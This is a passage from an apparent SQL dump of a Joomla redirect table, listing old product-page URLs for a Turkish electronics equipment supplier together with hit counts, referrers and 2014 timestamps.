00:00:00',301),(871,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',1,0,'2014-08-05 03:56:41','0000-00-00 00:00:00',301),(872,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',7,0,'2014-08-05 04:02:37','0000-00-00 00:00:00',301),(873,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',3,0,'2014-08-05 04:05:27','0000-00-00 00:00:00',301),(874,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',80,0,'2014-08-05 04:15:03','0000-00-00 00:00:00',301),(875,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',1,0,'2014-08-05 04:21:22','0000-00-00 00:00:00',301),(876,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',2,0,'2014-08-05 04:51:33','0000-00-00 00:00:00',301),(877,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',2,0,'2014-08-05 04:53:20','0000-00-00 00:00:00',301),(878,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',2,0,'2014-08-05 04:53:21','0000-00-00 00:00:00',301),(879,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',2,0,'2014-08-05 04:56:04','0000-00-00 00:00:00',301),(880,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',6,0,'2014-08-05 04:57:44','0000-00-00 00:00:00',301),(881,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',19,0,'2014-08-05 04:58:42','0000-00-00 00:00:00',301),(882,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',1,0,'2014-08-05 05:03:47','0000-00-00 00:00:00',301),(883,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',1,0,'2014-08-05 05:06:00','0000-00-00 00:00:00',301),(884,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',1,0,'2014-08-05 05:09:44','0000-00-00 00:00:00',301),(885,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',2,0,'2014-08-05 05:10:30','0000-00-00 00:00:00',301),(886,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',15,0,'2014-08-05 05:23:19','0000-00-00 00:00:00',301),(887,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103','','','',2,0,'2014-08-05 05:34:24','0000-00-00 00:00:00',301),(888,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',11,0,'2014-08-05 05:53:47','0000-00-00 00:00:00',301),(889,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',3,0,'2014-08-05 05:54:24','0000-00-00 00:00:00',301),(890,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',11,0,'2014-08-05 06:20:02','0000-00-00 00:00:00',301),(891,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',1,0,'2014-08-05 06:31:29','0000-00-00 00:00:00',301),(892,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',7,0,'2014-08-05 06:33:51','0000-00-00 00:00:00',301),(893,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',8,0,'2014-08-05 06:33:52','0000-00-00 00:00:00',301),(894,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',5,0,'2014-08-05 06:57:11','0000-00-00 00:00:00',301),(895,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',11,0,'2014-08-05 07:09:04','0000-00-00 00:00:00',301),(896,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',18,0,'2014-08-05 07:11:07','0000-00-00 00:00:00',301),(897,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',62,0,'2014-08-05 07:13:06','0000-00-00 00:00:00',301),(898,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',8,0,'2014-08-05 07:14:18','0000-00-00 00:00:00',301),(899,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',14,0,'2014-08-05 07:16:06','0000-00-00 00:00:00',301),(900,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',20,0,'2014-08-05 07:22:05','0000-00-00 00:00:00',301),(901,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107','','','',5,0,'2014-08-05 07:31:06','0000-00-00 00:00:00',301),(902,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en&sa=U&ei=sojgU6O1DZDi8AXf7YD4AQ&ved=0CJ4BEBYwHg&usg=AFQjCNGUXgY67iUTwzUjunpWGEjK3t','','','',1,0,'2014-08-05 07:35:43','0000-00-00 00:00:00',301),(903,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',7,0,'2014-08-05 07:40:43','0000-00-00 00:00:00',301),(904,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',13,0,'2014-08-05 07:40:43','0000-00-00 00:00:00',301),(905,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',1,0,'2014-08-05 07:59:46','0000-00-00 00:00:00',301),(906,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',5,0,'2014-08-05 08:03:46','0000-00-00 00:00:00',301),(907,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',2,0,'2014-08-05 08:26:29','0000-00-00 00:00:00',301),(908,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',1,0,'2014-08-05 08:30:29','0000-00-00 00:00:00',301),(909,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-05 08:35:47','0000-00-00 00:00:00',301),(910,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',5,0,'2014-08-05 08:37:24','0000-00-00 00:00:00',301),(911,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=125&Itemid=131','','https://www.google.com.tr/','',5,0,'2014-08-05 08:54:10','0000-00-00 00:00:00',301),(912,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',2,0,'2014-08-05 08:57:44','0000-00-00 00:00:00',301),(913,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',1,0,'2014-08-05 09:03:15','0000-00-00 00:00:00',301),(914,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',1,0,'2014-08-05 09:12:27','0000-00-00 00:00:00',301),(915,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',1,0,'2014-08-05 09:13:14','0000-00-00 00:00:00',301),(916,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',3,0,'2014-08-05 09:15:56','0000-00-00 00:00:00',301),(917,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',1,0,'2014-08-05 09:17:57','0000-00-00 00:00:00',301),(918,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',9,0,'2014-08-05 09:29:20','0000-00-00 00:00:00',301),(919,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',3,0,'2014-08-05 09:29:55','0000-00-00 00:00:00',301),(920,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',67,0,'2014-08-05 09:29:59','0000-00-00 00:00:00',301),(921,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',1,0,'2014-08-05 09:30:41','0000-00-00 00:00:00',301),(922,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',34,0,'2014-08-05 09:32:05','0000-00-00 00:00:00',301),(923,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',2,0,'2014-08-05 09:32:15','0000-00-00 00:00:00',301),(924,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',32,0,'2014-08-05 09:33:39','0000-00-00 00:00:00',301),(925,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',2,0,'2014-08-05 09:34:00','0000-00-00 00:00:00',301),(926,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',3,0,'2014-08-05 09:34:24','0000-00-00 00:00:00',301),(927,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',2,0,'2014-08-05 09:37:01','0000-00-00 00:00:00',301),(928,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',11,0,'2014-08-05 09:39:57','0000-00-00 00:00:00',301),(929,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',32,0,'2014-08-05 09:40:12','0000-00-00 00:00:00',301),(930,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',1,0,'2014-08-05 09:40:58','0000-00-00 00:00:00',301),(931,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',1,0,'2014-08-05 09:42:31','0000-00-00 00:00:00',301),(932,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',1,0,'2014-08-05 09:43:20','0000-00-00 00:00:00',301),(933,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',2,0,'2014-08-05 09:44:03','0000-00-00 00:00:00',301),(934,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',1,0,'2014-08-05 09:44:27','0000-00-00 00:00:00',301),(935,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',1,0,'2014-08-05 09:44:32','0000-00-00 00:00:00',301),(936,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',1,0,'2014-08-05 09:44:39','0000-00-00 00:00:00',301),(937,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',2,0,'2014-08-05 09:45:09','0000-00-00 00:00:00',301),(938,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',2,0,'2014-08-05 09:46:47','0000-00-00 00:00:00',301),(939,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',1,0,'2014-08-05 09:46:52','0000-00-00 00:00:00',301),(940,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',6,0,'2014-08-05 09:48:48','0000-00-00 00:00:00',301),(941,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',5,0,'2014-08-05 09:49:07','0000-00-00 00:00:00',301),(942,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',15,0,'2014-08-05 09:49:53','0000-00-00 00:00:00',301),(943,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',4,0,'2014-08-05 09:50:00','0000-00-00 00:00:00',301),(944,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',2,0,'2014-08-05 09:51:18','0000-00-00 00:00:00',301),(945,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',3,0,'2014-08-05 09:52:00','0000-00-00 00:00:00',301),(946,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',2,0,'2014-08-05 09:52:19','0000-00-00 00:00:00',301),(947,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',2,0,'2014-08-05 09:52:22','0000-00-00 00:00:00',301),(948,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',3,0,'2014-08-05 09:52:53','0000-00-00 00:00:00',301),(949,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',1,0,'2014-08-05 09:53:33','0000-00-00 00:00:00',301),(950,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',3,0,'2014-08-05 09:53:37','0000-00-00 00:00:00',301),(951,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',2,0,'2014-08-05 09:53:51','0000-00-00 00:00:00',301),(952,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',3,0,'2014-08-05 09:54:39','0000-00-00 00:00:00',301),(953,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',2,0,'2014-08-05 09:55:36','0000-00-00 00:00:00',301),(954,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',1,0,'2014-08-05 09:55:44','0000-00-00 00:00:00',301),(955,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',2,0,'2014-08-05 09:56:17','0000-00-00 00:00:00',301),(956,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',1,0,'2014-08-05 09:56:22','0000-00-00 00:00:00',301),(957,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',3,0,'2014-08-05 09:58:07','0000-00-00 00:00:00',301),(958,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-05 09:58:25','0000-00-00 00:00:00',301),(959,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',2,0,'2014-08-05 09:58:28','0000-00-00 00:00:00',301),(960,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',3,0,'2014-08-05 10:00:15','0000-00-00 00:00:00',301),(961,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',1,0,'2014-08-05 10:01:20','0000-00-00 00:00:00',301),(962,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',5,0,'2014-08-05 10:01:30','0000-00-00 00:00:00',301),(963,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',27,0,'2014-08-05 10:06:29','0000-00-00 00:00:00',301),(964,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',10,0,'2014-08-05 10:06:34','0000-00-00 00:00:00',301),(965,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',25,0,'2014-08-05 10:06:40','0000-00-00 00:00:00',301),(966,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',18,0,'2014-08-05 10:06:48','0000-00-00 00:00:00',301),(967,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',17,0,'2014-08-05 10:10:55','0000-00-00 00:00:00',301),(968,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',4,0,'2014-08-05 10:11:01','0000-00-00 00:00:00',301),(969,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',7,0,'2014-08-05 10:11:24','0000-00-00 00:00:00',301),(970,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',20,0,'2014-08-05 10:11:29','0000-00-00 00:00:00',301),(971,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',2,0,'2014-08-05 10:11:40','0000-00-00 00:00:00',301),(972,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',1,0,'2014-08-05 10:11:44','0000-00-00 00:00:00',301),(973,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',35,0,'2014-08-05 10:11:50','0000-00-00 00:00:00',301),(974,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',11,0,'2014-08-05 10:11:53','0000-00-00 00:00:00',301),(975,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',4,0,'2014-08-05 10:11:57','0000-00-00 00:00:00',301),(976,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',1,0,'2014-08-05 10:12:02','0000-00-00 00:00:00',301),(977,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',14,0,'2014-08-05 10:12:09','0000-00-00 00:00:00',301),(978,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',1,0,'2014-08-05 10:12:27','0000-00-00 00:00:00',301),(979,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',2,0,'2014-08-05 10:12:37','0000-00-00 00:00:00',301),(980,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','https://www.google.com.tr/','',4,0,'2014-08-05 10:13:24','0000-00-00 00:00:00',301),(981,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',4,0,'2014-08-05 10:24:21','0000-00-00 00:00:00',301),(982,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',1,0,'2014-08-05 10:41:24','0000-00-00 00:00:00',301),(983,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',2,0,'2014-08-05 10:43:47','0000-00-00 00:00:00',301),(984,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',9,0,'2014-08-05 10:54:23','0000-00-00 00:00:00',301),(985,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',3,0,'2014-08-05 11:14:08','0000-00-00 00:00:00',301),(986,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',40,0,'2014-08-05 11:25:27','0000-00-00 00:00:00',301),(987,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',15,0,'2014-08-05 11:29:12','0000-00-00 00:00:00',301),(988,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141','','','',1,0,'2014-08-05 11:32:16','0000-00-00 00:00:00',301),(989,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',4,0,'2014-08-05 11:33:04','0000-00-00 00:00:00',301),(990,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',2,0,'2014-08-05 11:47:18','0000-00-00 00:00:00',301),(991,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',1,0,'2014-08-05 11:47:26','0000-00-00 00:00:00',301),(992,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',3,0,'2014-08-05 11:49:46','0000-00-00 00:00:00',301),(993,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141','','','',5,0,'2014-08-05 11:50:45','0000-00-00 00:00:00',301),(994,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',1,0,'2014-08-05 12:14:37','0000-00-00 00:00:00',301),(995,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',17,0,'2014-08-05 12:21:34','0000-00-00 00:00:00',301),(996,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',8,0,'2014-08-05 12:21:35','0000-00-00 00:00:00',301),(997,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',12,0,'2014-08-05 12:27:14','0000-00-00 00:00:00',301),(998,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',5,0,'2014-08-05 12:30:06','0000-00-00 00:00:00',301),(999,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',1,0,'2014-08-05 12:35:11','0000-00-00 00:00:00',301),(1000,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',11,0,'2014-08-05 12:35:12','0000-00-00 00:00:00',301),(1001,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',61,0,'2014-08-05 12:51:57','0000-00-00 00:00:00',301),(1002,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',1,0,'2014-08-05 12:53:18','0000-00-00 00:00:00',301),(1003,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',3,0,'2014-08-05 13:24:23','0000-00-00 00:00:00',301),(1004,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-05 13:29:01','0000-00-00 00:00:00',301),(1005,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',7,0,'2014-08-05 13:30:08','0000-00-00 00:00:00',301),(1006,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',1,0,'2014-08-05 13:33:27','0000-00-00 00:00:00',301),(1007,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',9,0,'2014-08-05 13:46:34','0000-00-00 00:00:00',301),(1008,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',4,0,'2014-08-05 13:47:15','0000-00-00 00:00:00',301),(1009,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',50,0,'2014-08-05 13:48:20','0000-00-00 00:00:00',301),(1010,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',1,0,'2014-08-05 13:50:43','0000-00-00 00:00:00',301),(1011,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',30,0,'2014-08-05 13:52:15','0000-00-00 00:00:00',301),(1012,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',2,0,'2014-08-05 13:55:10','0000-00-00 00:00:00',301),(1013,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',2,0,'2014-08-05 13:55:53','0000-00-00 00:00:00',301),(1014,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',5,0,'2014-08-05 14:01:09','0000-00-00 00:00:00',301),(1015,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119','','','',6,0,'2014-08-05 14:10:06','0000-00-00 00:00:00',301),(1016,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',2,0,'2014-08-05 14:16:11','0000-00-00 00:00:00',301),(1017,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',2,0,'2014-08-05 14:17:35','0000-00-00 00:00:00',301),(1018,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',6,0,'2014-08-05 14:24:10','0000-00-00 00:00:00',301),(1019,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',1,0,'2014-08-05 14:33:01','0000-00-00 00:00:00',301),(1020,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',2,0,'2014-08-05 14:34:51','0000-00-00 00:00:00',301),(1021,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',54,0,'2014-08-05 14:42:48','0000-00-00 00:00:00',301),(1022,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',14,0,'2014-08-05 14:43:01','0000-00-00 